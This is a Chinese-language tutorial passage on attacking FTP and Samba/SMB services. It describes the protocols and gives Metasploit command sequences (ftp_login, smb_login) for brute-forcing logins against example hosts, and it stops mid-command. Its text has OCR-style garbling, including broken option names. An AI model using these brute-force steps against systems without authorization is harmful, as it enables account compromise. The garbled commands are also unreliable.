主机与数据库安全
主机共享端口及漏洞利用/检测
FTP服务
端口: 21
FTP是File Transfer Protocol (文议) 的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是件传输协一个应用程序( Application )。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一-种协议以传输文件。
直接访问ftp://xx.xx.xxxx
FTP暴力破解
ftp的爆破工具有很多,常见的暴力破解工具有hydra、medusa 超级弱口令爆破工具等,推荐使用msf中的ftp模块、超级弱口令爆破工具
use auxiliary/scanner/ftp/ftp_login
set RHOSTS 192.168.109.134
set USER_ FILE /home/dic/dic_username_ ftp.txt
set PASS_ FILE /home/dic/dic_ password_ ftp.txt
set THREADS 30
run
Samba概述
默认端口: 137、135、139、 445等
Samba是linux和unix系统上实现smb协议的一个免费软件,由服务器及客户端程序构成Samba服务:对于这个可以在windows与Linux之间进行共享文件的服务同样是我们攻击的关注点; samba登录分为两种方式,一种是需要用户名口令; 另- -种是不需要用户名口令。在很多时候不光是pc机,还有一-些服务器, 网络设备都开放着此服务,方便进行文件共享,但是同时也给攻击者提供了便利。
默认端口: 445
SMB(Server Message Block) Windows协议族,用于文件和打印共享服务。
Samba暴力破解
msf > use auxiliary/scanner/smb/smb_login (使用smb_login模块)
msf auxiliary(smb_ login) > show options (查看选项)
msf auxiliary(smb_ login) > set RHOSTS 10.180.100.10 (目标)
msf auxiliary(ssmb_ login) > set U